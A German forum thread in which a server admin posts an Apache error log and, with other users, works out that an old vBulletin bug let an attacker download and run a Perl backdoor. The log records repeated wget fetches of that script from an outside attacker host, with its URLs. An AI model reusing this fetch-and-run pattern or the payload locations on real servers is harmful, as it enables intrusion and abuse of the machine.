Apache error_log - komische Einträge

[jmar]

Hallo,

hab im Apache error_log merwürdige Einträge stehen. Siehe unten ab "Premature end of JPEG file". Danach sieht es so aus, als ob "jemand" gezielt eine Verbindung nach außen aufbaut und eine Datei auf dem Server speichert. Wenn man sich die Datei anschaut, die versucht gespeichert zu werden (http://geocities.yahoo.com.br/maninho12345/own.txt), dann soll das ein "Telnet-like Standard Daemon 0.7" sein "For those guys that still like to open ports and use non-rooted boxes".

Sieht nicht so gut aus, oder?!

Kann man hieraus Konkretes folgern?
Ist das ein Script auf dem Server, welches ein Sicherheitsloch hat?
Hat das für den "Angreifer" wirklich geklappt, die Datei auf dem Server zu speichern?
Wie kann ich rausfinden, welches Script das Sicherheitsloch bietet?

Ich hab natürlich schonmal bisschen in den Webserver-Logs gestöbert, aber bis jetzt nichts gefunden.
Und ich hab auch nach einer Datei auf dem Webserver gesucht, die den Inhalt von der own.txt hat, hab aber auch hier bis jetzt nichts gefunden.


[Die "[error] Undefined subroutine CGI::end_form ..." sind noch ne ganz andere Geschichte. Aus welchen Gründen auch immer startet der Apache nicht bei jedem Mal, sondern nur nach diversen Versuchen (normalerweise zwischen 1-20), wenn man ihn mal neu startet ... Hat er schon seit langem (immer) und wir haben bis jetzt keine Lösung dazu gefunden ...]


Gruss
Johannes

...
[Mon Sep 26 11:37:52 2005] [notice] Apache/1.3.28 (Linux/SuSE) mod_ssl/2.8.15 OpenSSL/0.9.7b PHP/4.3.3 mod_perl/1.28 configured -- resuming normal operations
[Mon Sep 26 11:37:52 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Mon Sep 26 11:37:52 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Mon Oct 10 06:14:14 2005] [notice] caught SIGTERM, shutting down
[Mon Oct 10 06:14:28 2005] [error] Undefined subroutine CGI::end_formn at /usr/include/apache/modules/perl/startup.perl line 19nCompilation failed in require at (eval 2) line 1.n
Syntax error on line 862 of /etc/httpd/httpd.conf:
Undefined subroutine CGI::end_form
at /usr/include/apache/modules/perl/startup.perl line 19
Compilation failed in require at (eval 2) line 1.

[Mon Oct 10 06:14:35 2005] [error] Undefined subroutine CGI::end_formn at /usr/include/apache/modules/perl/startup.perl line 19nCompilation failed in require at (eval 2) line 1.n
Syntax error on line 862 of /etc/httpd/httpd.conf:
Undefined subroutine CGI::end_form
at /usr/include/apache/modules/perl/startup.perl line 19
Compilation failed in require at (eval 2) line 1.

[Mon Oct 10 06:14:42 2005] [notice] Apache/1.3.28 (Linux/SuSE) mod_ssl/2.8.15 OpenSSL/0.9.7b PHP/4.3.3 mod_perl/1.28 configured -- resuming normal operations
[Mon Oct 10 06:14:42 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Mon Oct 10 06:14:42 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Oct 11 04:45:47 2005] [notice] caught SIGTERM, shutting down
[Tue Oct 11 04:46:03 2005] [error] Undefined subroutine CGI::end_formn at /usr/include/apache/modules/perl/startup.perl line 19nCompilation failed in require at (eval 2) line 1.n
Syntax error on line 862 of /etc/httpd/httpd.conf:
Undefined subroutine CGI::end_form
at /usr/include/apache/modules/perl/startup.perl line 19
Compilation failed in require at (eval 2) line 1.

[Tue Oct 11 04:46:08 2005] [notice] Apache/1.3.28 (Linux/SuSE) mod_ssl/2.8.15 OpenSSL/0.9.7b PHP/4.3.3 mod_perl/1.28 configured -- resuming normal operations
[Tue Oct 11 04:46:08 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Oct 11 04:46:08 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
Premature end of JPEG file
--22:41:25-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.52 KB/s

22:41:26 (69.52 KB/s) - »own.txt« gespeichert [11675/11675]

sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
--17:42:33-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.1'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.52 KB/s

17:42:36 (69.52 KB/s) - »own.txt.1« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
--17:42:36-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.2'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 67.87 KB/s

17:42:37 (67.87 KB/s) - »own.txt.2« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
--17:43:05-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.3'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.52 KB/s

17:43:06 (69.52 KB/s) - »own.txt.3« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
--17:43:06-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.4'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.95 KB/s

17:43:07 (69.95 KB/s) - »own.txt.4« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
Nonfatal Error : '/www//fm/galerie/temp/galleryhn2ZeJ' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryhn2ZeJ' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/56_Feuerdistel.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/56_Feuerdistel.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryub3b1U' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryub3b1U' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/64_blume_im_bogen.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/64_blume_im_bogen.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryJSD6ku' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryJSD6ku' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/49_blauer_strauch.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/49_blauer_strauch.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryLIbJyw' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryLIbJyw' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/47_ohne_dach.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/47_ohne_dach.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryNMIClO' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryNMIClO' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/49orange_blumen.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/49orange_blumen.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryB4qfMS' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryB4qfMS' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/46_tanzen.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/46_tanzen.jpg' Illegally sized directory
--05:55:14-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.5'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.52 KB/s

05:55:15 (69.52 KB/s) - »own.txt.5« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
--05:55:15-- http://geocities.yahoo.com.br/maninho12345/own.txt
=> `own.txt.6'
Auflösen des Hostnamen »geocities.yahoo.com.br«.... fertig.
Verbindungsaufbau zu geocities.yahoo.com.br[66.218.77.68]:80... verbunden.
HTTP Anforderung gesendet, warte auf Antwort... 200 OK
Länge: 11,675 [text/plain]

0K .......... . 100% 69.52 KB/s

05:55:15 (69.52 KB/s) - »own.txt.6« gespeichert [11675/11675]

could not listen on port 4567: Die Adresse wird bereits verwendet at own.txt line 101.
sh: ./own.txt: /usr/bin/perlM: bad interpreter: Datei oder Verzeichnis nicht gefunden
Nonfatal Error : '/www//fm/galerie/temp/galleryT1ufNQ' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryT1ufNQ' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/71_frau_in_schmerz.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/71_frau_in_schmerz.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/gallerylZGDTo' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/gallerylZGDTo' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/72_blumentanz_001.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/72_blumentanz_001.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/galleryN3YFQ3' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/galleryN3YFQ3' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/73_frau_in_sich.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/73_frau_in_sich.jpg' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/temp/gallery5lySZi' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/temp/gallery5lySZi' Illegally sized directory
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/75_m_de_blume_2.jpg' Illegal exif or interop ofset directory link
Nonfatal Error : '/www//fm/galerie/albums/Aquarelle/75_m_de_blume_2.jpg' Illegally sized directory

*hier ist die Log-Datei zu Ende*

[blnsnoopy26]

Hi,

Da versucht jemand auf deinen Rooti zu kommen, wenn man sich die own.txt ansieht - sieht für ganz stark danach aus.

Und php version 4.3.3 und Apache 1.3.28 sind eher nicht das neuste.
Ich würde die kiste neu aufsetzen und mal aktuelle Pakete aufspielen.

Und evtl. noch eine CMS wie phpnuke drauf, dann ist alles perfekt für den der eindringen will.

Nach dem was ich sehe denke ich handelt es sich hier um das unsichere phpnuke CMS Galerysystem.

[jmar]

Nach dem was ich sehe denke ich handelt es sich hier um das unsichere phpnuke CMS Galerysystem.

Nee, ist die Menalto-Gallery.

Ansonsten läuft noch ein vBulletin.

[Joe User]

Nee, ist die Menalto-Gallery.

Das ist letztendlich egal, das Ding hat (bekannte) Sicherheitslöcher und hat somit vorerst verspielt -> System reinitialisieren und die Gallery erst nach dem fälligem Bugfix-Release wieder installieren (wenn überhaupt).

Ansonsten läuft noch ein vBulletin.

Alle bekannten Bugs gefixt?

[memo1003]

schau mal hier http://geocities.yahoo.com.br/maninho12345/
ein klick auf mano.jpg

http://geocities.yahoo.com.br/maninho12345/mano.jpg
das ist alle anderes auser ein bild...

[jmar]

Nach ausführlicher Recherche ist Folgendes passiert:

Jemand hat über einen Bug (*) im vBulletin das PerlScript http://geocities.yahoo.com.br/maninho12345/own.txt auf dem Server im Verzeichnis /tmp/ speichern können und anscheinend ausführen können. Darüber hat er dann eine Spam-Aktion an hotmail-User durchgeführt.

(*) War leider ein alter bekannter Bug. Auf dem Server laufen zwei vBulletins, eins davon ist noch im dev-Stadium. Leider hatte mein Kollege der daran arbeitet nicht ausreichend auf den Bug reagiert. War übrigens die Sicherheitslücke in misc.php die mit dem Update auf 3.0.7 geschlossen wurde.

Leider also eine selbst verschuldete Aktion. :oops: Asche auf mein Haupt ...

Viele Grüsse
Johannes

[jmar]

Ansonsten läuft noch ein vBulletin.

Alle bekannten Bugs gefixt?

Ich wünschte ich könnte ja sagen. Muss aber jetzt eindeutig nein sagen (s.o.). :oops:

Gruss
Johannes

[jmar]

schau mal hier http://geocities.yahoo.com.br/maninho12345/
ein klick auf mano.jpg

http://geocities.yahoo.com.br/maninho12345/mano.jpg
das ist alle anderes auser ein bild...

Hui, da liegt ja einiges rum. Scheint ein aktives Kerlchen zu sein ...